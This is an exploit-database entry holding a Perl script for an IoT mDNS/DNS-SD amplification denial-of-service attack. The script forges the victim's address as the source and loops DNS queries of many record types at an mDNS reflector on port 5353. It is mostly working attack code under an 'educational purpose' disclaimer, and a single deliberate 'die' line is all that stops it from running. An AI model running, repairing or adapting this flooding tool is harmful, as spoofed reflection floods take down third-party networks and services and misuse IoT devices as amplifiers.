IoT mDNS/DNS-SD QM Amplification Distributed Denial Of Service

2017.07.05
Credit: Todor Donev
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/perl # # IoT mDNS/DNS-SD 'QM' amplification ddos # # Copyright 2017 (c) Todor Donev # todor.donev@gmail.com # https://www.ethical-hacker.org/ # https://www.facebook.com/ethicalhackerorg # # # Disclaimer: # This or previous program is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Todor Donev is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Todor Donev's # responsibility. # # Use at your own risk and educational # purpose ONLY! # # See also, UDP-based Amplification Attacks: # https://www.us-cert.gov/ncas/alerts/TA14-017A # # # use Net::RawIP; use Net::DNS; use Data::Validate::IP qw(is_ipv4); my ($target, $mdnsamp) = @ARGV; my $port = '5353'; die("r34d 7h3 c0d3 m0r0n\n"); die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535); die "[ Usage: perl $0 <target> <mdns amplificator>\n" unless (scalar @ARGV)==2; die "[ Error: Invalid IP address\n" if not is_ipv4(@ARGV); @domains = qw( _workstation.tcp.local _http._tcp.local _ipp._tcp.local _services._tcp.local _workstation.udp.local _services._udp.local _device-info._udp.local _services._dns-sd._udp.local _services._dns-sd._tcp.local _rfb._tcp.local _touch-able._tcp.local _home-sharing._tcp.local _hap._tcp.local _net-assistant._udp.local _afpovertcp._tcp.local _smb._tcp.local _sftp-ssh._tcp.local _ssh._tcp.local _scanner._tcp.local _uscan._tcp.local _http-alt._tcp.local _appletv-itunes._tcp.local _raop._tcp.local _touch-remote._tcp.local _dacp._tcp.local _printer._tcp.local _music._tcp.local _readynas._tcp.local _pdl-datastream._tcp.local _tivo-videos._tcp.local _csco-sb._tcp.local ); print "[ IoT mDNS/DNS-SD 'QM' amplification ddos\n"; print "[ === \n"; print "[ Copyright 2017 (c) Todor Donev\n"; print "[ todor.donev\@gmail.com\n"; print "[ https://www.ethical-hacker.org/\n"; print "[ https://www.facebook.com/ethicalhackerorg\n"; while(){ for (my $j=0; $j<=@domains; $j++) { my $NSQueryPak = new Net::DNS::Packet($domains[$j], "NS", "IN"); my $nsdata = $NSQueryPak->data; my $AQueryPak = new Net::DNS::Packet($domains[$j], "A", "IN"); my $adata = $AQueryPak->data; my $TXTQueryPak = new Net::DNS::Packet($domains[$j], "TXT", "IN"); my $txtdata = $TXTQueryPak->data; my $ANYQueryPak = new Net::DNS::Packet($domains[$j], "ANY", "IN"); my $anydata = $ANYQueryPak->data; my $PTRQueryPak = new Net::DNS::Packet($domains[$j], "PTR", "IN"); my $ptrdata = $PTRQueryPak->data; my $SRVQueryPak = new Net::DNS::Packet($domains[$j], "SRV", "IN"); my $srvdata = $SRVQueryPak->data; my $sock = new Net::RawIP({ udp => {} }) or die "[ Error: $!\n"; $sock->set({ ip => { saddr => $target, daddr => $mdnsamp}, udp => { source => 31337, dest => $port, data => $adata}}) or die "[ Error: $!\n"; $sock->send; $sock->set({udp => { data=>$txtdata }}); $sock->send; $sock->set({udp => { data=>$anydata }}); $sock->send; $sock->set({udp => { data=>$srvdata }}); $sock->send; $sock->set({udp => { data=>$ptrdata }}); $sock->send; $sock->set({udp => { data=>$nsdata }}); $sock->send; select(undef, undef, undef, 0.20); } }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top